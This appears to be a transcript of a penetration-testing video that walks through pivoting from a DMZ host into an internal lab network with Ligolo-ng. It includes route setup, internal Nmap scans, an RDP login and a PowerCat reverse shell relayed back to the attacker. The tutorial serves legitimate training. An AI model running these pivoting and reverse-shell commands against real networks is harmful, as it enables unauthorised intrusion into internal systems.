How do hackers move through computer networks? Once they've gained access to one computer, how do they move on to compromise others? The technique is called lateral movement, using one device to reach another. But even ethical hackers who do what's called penetration testing for their professional job, they need to move from one whole network to another. If a penetration tester compromises a website or a publicly accessible service like email servers or any other technology, they usually land in what's called the DMZ, or the Demilitarized Zone Network. Computers and servers inside the DMZ network can be accessed from the public internet, but a company's internal network cannot. So those DMZ computers act as the boundary between the internal LAN, or the local area network, and the outside world. But because these computers sit sort of in between both, the devices themselves can reach the internal network. So professional hackers take advantage of this. In order to get more access, they need to pivot into the internal environment. And that's the key word here, pivoting. There are a lot of tools that help with this, like Chisel and proxy chains, and we've showcased those in other videos, but I wanted to tell you about another tool called Ligolo, and by extension of that, Ligolo NG, or Next Generation. The original tool, Ligolo on its own, is a program written in Golang. Golang is a perfect programming language for this because it's super fast and awesome with concurrency, or doing multiple things all at once. But I would like to focus on the more recently updated and improved rendition called Ligolo Next Generation, or Ligolo NG. You can find it online with the links below, and of course, credit where credit is due, big thanks to the creator Nicholas Chatelain, and I'm sorry if I get your name wrong. Ligolo NG introduces itself as a simple, lightweight, and fast tool that allows penetration testers to establish tunnels from a reverse TCP or TLS connection using a TUN interface. What that means is that the professional ethical hacker can easily pivot into another network, and they don't need to use all this extra overhead with other tools like proxy chains or other setup and configuration. Ligolo NG just makes it super easy. Ligolo NG is still written in the Golang programming language, and you can find all the source code on GitHub if you'd like to take a look, but they're kind enough to give out the program pre-built as a formal release. We can go download those and try it out ourselves. Now, I like to use Kali Linux, a distribution of the Linux operating system, different from Windows but purpose-built for penetration testing and ethical hacking. You can use Ligolo NG on Linux or Windows or Mac. It can run on all of those different operating systems, and that's what they call being cross-platform. If we navigate to the releases page in our web browser, you have to be sure to click the Show All Assets text at the bottom of the latest section, because we have multiple different programs that we need to download. We need the Ligolo NG agent and the Ligolo NG proxy. I'll download the Linux AMD 64 version, and that's likely the correct version for you too if you're using Kali Linux. These are both in a file format called a gzip tar archive, so I'll extract these locally on my computer with this command tar xzvf. X for extract, Z for gzip compression, V for verbose, and F to specify the file. And for us to be able to practice and play with this, we need our own lab environment, like a playground or a testbed and sandbox with an internal network so that we can do pivoting. That can be a little annoying to set up with some local virtual machines, using programs like VMware Workstation or VirtualBox. So just to make things easy, I've spun up a small cloud environment with Snap Labs. If you would like, you can import the template with the link below and follow along. That also gives us a really nice visual and a whole graph and network diagram so we can get a better idea as to how this pivoting really works. So I'll go ahead, start up the lab environment, connect to it, and log in. Now, before we go too far down the rabbit hole, I'd love to take a moment to tell you about something really cool. This is a super awesome company, and especially if you're a business that cares about cybersecurity, you should get to know Vanta. It's how you streamline security reviews and automate compliance. Vanta is the leading trust management platform with over 300 integrations for your software stack, so you can measure your security controls, match necessary policy requirements, and meet the mandates for audits of your business and security posture. With Vanta, you can automate your progress to meet standard regulatory requirements. And there are so many out there, between SOC 2, HIPAA, ISO 27001, PCI, GDPR, and all the different compliance needs. You can run tests to validate and verify your controls are in place, remediate issues, manage risk, and ultimately prove your security compliance. Vanta allows you to publish a continuous and real-time trust center on your public website, or you can share them personally with customers and prospects. You can even allow auditors to log in themselves and assess your security posture. So at the end of the day, customers know that you are a business they can trust. You can build confidence, streamline your security requirements, close deals faster, and increase revenue with Vanta. Join over 6,000 companies partnering with Vanta and prove your security compliance. Get $1,000 off Vanta with my link below in the video description, jh.live/Vanta. Huge thanks to Vanta for sponsoring this video. Now let's get a big picture view of our pivoting lab environment. We are operating from our attacker computer, Kali Linux, at that IP address 172.19.254 blah blah blah. And say that we compromised a computer within the DMZ. And for the sake of our learning environment, we'll call that the pivot machine, with IP address 10.1.1.10. In this example, it's a simple Linux computer, but remember, Ligolo NG can work just as well on anything Linux, Windows, or Mac. Now, we have access to that DMZ computer. We know the password and credentials to log in, either from brute forcing or phishing or malware or whatever. Ultimately, we can control that jump box, or our pivot machine. So let's put our Ligolo NG agent program there, because that's what we would consider our target. It is in the DMZ, and while it has that quote-unquote public IP address 10.1.1.10, it also has an internal IP address 10.1.2.4. That means there might be other computers or servers or resources in that other network. But right now, we don't have access to it. We don't have the networking routes from our attacker machine to be able to access anything in there. If I wanted to ping or try to reach 10.1.2.4 or anything like .2.5 or .2.10, anything that might be out in that internal network, we can't reach it. So that is our goal. We need to gain access to that .2 network, and to do that, we will pivot with Ligolo NG. Now, first things first, over on our Kali Linux attacking computer, we need to create a new tunnel interface. We need the local networking capability to work with Ligolo NG. And for that reason, we'll create a new tunnel device. We do this every single time that we want to use Ligolo NG. The commands to do that are pretty easy, and you can find them on GitHub just as well. We'll go ahead and type in sudo iptuntap add user Kali mode tun Ligolo. And Kali would just be replaced with your username on your attacking machine if that varies. Then we run sudo iplink set Ligolo up. And that is all it takes. Now, if I run the command ip_add show, we should be able to see our Ligolo interface is created and ready for us. Next, we can start up Ligolo NG by running the proxy program from our Kali Linux attacking computer. We have to talk through this a little bit though, because Ligolo NG uses TLS certificates for encrypted communication. They make it super duper easy. It can automatically connect to Let's Encrypt servers, then it'll register and configure its own certificate, but that means that it relies on an internet connection. If you don't have an active internet connection in the environment that you're working with, like we don't in our sandbox practice playground, you can create your own certificate and pass it in with some command line arguments, or you can tell the proxy to just generate its own self-signed certificates. But that self-signed certificate option isn't really recommended. They can be subjected to man-in-the-middle attacks or whatever other nefarious snooping, so that should be avoided. The Ligolo NG README online on their GitHub literally says that option should only be done in a testing environment for debugging purposes. So that is what we'll have to do here. But in most cases, when you're performing a real penetration test, you could just simply use the TAC auto cert option and you don't need to do anything else. For this video demonstration though, and solely for our learning and practice, because we don't have internet, we will use the TAC self-cert option for our proxy program. And we'll have to tell the agent to use this TAC ignore TAC cert. Remember, that shouldn't be needed, we're just doing it for this demonstration and showcase, but when you use Ligolo NG for real, you can just use the TAC auto cert option. With all that said, let's go ahead and do it. On our Kali Linux attacker machine, let's run the Ligolo ng program /proxy tac self-cert. And that's it. Now our server side is up and running and waiting to hear connections from the jump box and our pivot machine. So in a terminal that is logged into our pivot machine, let's run the Ligolo ng agent program. The command line arguments should be /agent tac connect with our attacker IP address and a colon to denote the port number. That port number is 11,601 by default, and we can actually go see that over on our server side. And remember, because we don't have access to the internet to be able to reach out to Let's Encrypt and get an automatic certificate, we will need to supply for this demonstration the tac ignore tac cert option. Remember, you don't have to supply that when you're using Ligolo ng for real. And that should display connection established, and it worked. We can go look over on our server side on the Kali Linux attacker machine, and we can see agent joined. It includes the user and host name on the right-hand side and the remote IP address and port that this connection came from. Now, this did not do anything special yet. We have not started our tunnel yet. So back over on our Kali Linux proxy server side, we'll need to enter the command session to be able to list out all the active and connected sessions from that agent. With that, we can use the arrow keys to move up and down to select another agent if we had multiple, but in this case, we only have one. So we can just hit enter, and now you can see our prompt has changed. Now we're working within the context of that agent over on the pivot machine. We can type ifconfig to see the network configuration of all the interfaces on that host, and we can see all these different devices. These are separated into different boxes, and the first one is the LO interface, or loopback, meaning just local communication with that computer itself, the 127.0.0.1 IP address. In this case, the second box is the more public, again, quote unquote, or externally accessible, and the DMZ IP address, 10.1.1.10. But the final box down below is the local area network interface. Check it out. We can see the IP address here, 10.1.2.4. The pivot box does have access to the internal network. So finally, we can now set up our tunnel and pivot into the internal environment. Now that this agent is connected to our proxy, we can go ahead and add a networking route on our attacker machine. So we'll open up another terminal within the Kali Linux side, and we'll run the command sudo IP route add 10.1.2.0/24 dev Ligolo. We use a .0/24 because we want access to that whole subnet. Everything in that LAN, not just the .2.4 pivot box. But we can use that Ligolo device that we created to tunnel through that pivot box. And that is why we specify dev Ligolo at the end of that command. And now finally, once that route has been set up, we need to go back to our Ligolo ng proxy. On our Kali Linux machine, within the context of our agent session, we'll enter the command start. It'll say starting tunnel to our pivot machine, and that's it. It's all done. Now from our attacker host, we can just naturally access anything within that internal environment. We don't even need to use proxy chains. We can just literally use the 10.1.2 IP addresses. Look, now I can ping 10.1.2.4, and I couldn't do that before. And I can run other pen testing programs like Nmap or Feroxbuster or fire off any attack scripts and exploits. Ligolo ng makes this super easy. Here, I'll run Nmap 10.1.2.0/24 so I can scan for open ports across that whole internal network, and we get some results. We see 10.1.2.5 has port 80 open, so that offers a website. We can now just go to our web browser and literally go straight to the IP address 10.1.2.5. We don't need to set up proxy chains or any of this browser configuration settings. We can just go straight to the IP address and the website. That is awesome. And since Nmap doesn't need to funnel through proxy chains, it's not super slow like usual, we could just try and use the tac-pn argument to see if we can get any other devices. And yeah, there's a whole nother host here, 10.1.2.6. And that looks to have port 3389 on, or the remote desktop services and RDP. So we can just simply connect to that with any RDP client. Here, I'll use xfree RDP on the command line, and say we have credentials for this again from whatever penetration testing we've already done. And thanks to Ligolo ng, we can just access that internal host super easily. Looks like this is a Windows server, and now that we have access to that, if that happened to have another network interface or device to access other networks, we could just add another Ligolo NG agent on there and keep on pivoting. But just to showcase, learn a couple more features of Ligolo NG, say that we want to get a connection back from that Windows internal host. Say we want a reverse shell back from the Windows host to our Kali Linux attacker machine. Now remember, the internal host can't reach us. It doesn't have the networking capability to do that. It can only reach the DMZ. So can we use our pivot machine to funnel that back to our attacking machine on Kali Linux? Well, yes, we absolutely can. Normally, you'd have to set up like port forwarding and get some connections prepared to link one to the other, but Ligolo NG makes this so easy. With Ligolo NG, we can listen to ports on the agent and then redirect the connections back to our proxy server. So if we go back to our proxy server and inside of our agent context, we can set this all up just using one command here, listener add. Here's the syntax, listener _ add tac adder 0.0.0.0 : 30,000 tac2 127.0.0.1 : 10,000 tac TCP. Now, we'll use 0.0.0.0 to specify the binding listening address on the agent, which means that on the pivot machine, any device or interface on port 30,000, that's a fine ephemeral port, probably not being used by any other services, any network traffic there will get forwarded to our address relative to us. On our attacker machine, we're specifying 127.0.0.1 to refer to ourselves, our Kali Linux attacker machine. That'll get funneled and redirected to our port 10,000. So now, on another terminal on our Kali Linux attacker machine, we can just use the command line tool netcat to listen on port 10,000. Then, back over on our internal Windows computer where we have this RDP session open, we can just slap in the syntax to use something like PowerCat, which allows us to get a simple, quick and easy reverse shell. With all that code staged, we can now use PowerCat to connect to the pivot machine, because remember, that's the only thing it can access in its internal environment, on that port 30,000. But that will be forwarded, thanks to Ligolo NG, to our attacker machine on port 10,000. Let's run that syntax. PowerCat tac-c 10.1.2.4, our internal pivot machine, tac-p 30,000, and tac-ep to execute PowerShell. Now back on our Kali Linux attacker machine, we can see the connection, and we have reverse shell command line access to that internal target. And we didn't have to deal with proxy chains or port forwarding or any of that nonsense. Ligolo NG just handled it all for us. And on top of all that, we didn't even need root access or like administrative privileges or permissions on that agent. We could just run it as any low privilege user. Now, another fun thing, if at any point you want to access the local ports of your pivot machine, the jump box where our Ligolo NG agent is running, if you want to access that all from your attacker machine back on Kali Linux, you can add a special route and use a unique IP address to access it. Check it out. This is a magic IP address that Ligolo NG understands and created for itself, 240.0.0.1. I know it's weird, but that is how Ligolo NG knows to automatically redirect any network traffic to the agent's local IP address, 127.0.0.1. Look at this. Let's try out that syntax. Sudo IP route add 240.0.0.1 /32, to be specific with that address, dev Ligolo. Hit enter and then you're done. Now you can do whatever you want. Let me nmap 240.0.0.1. And here you can see port 22 is open for SSH or secure shell. And that is exactly how we got onto this pivot box in the first place. But if there were any locally listening services, like things you could only access internal to that box, now you can access them. All again thanks to Ligolo NG. And this incredible Ligolo NG tool is one way that ethical hackers and penetration testers can pivot and move through computer networks. I hope you give Ligolo NG a try. You can check it out with the links below in the video description. And while you're down there, please give some love to our sponsor, Vanta. Seriously, they're incredible. And look, if you're working in cybersecurity, you want to make sure that your own security is all buttoned up the best that it can be. And you want to be able to prove that to your customers and prospects. Thank you so much for watching. Hope you enjoyed this video, and I'll see you in the next one.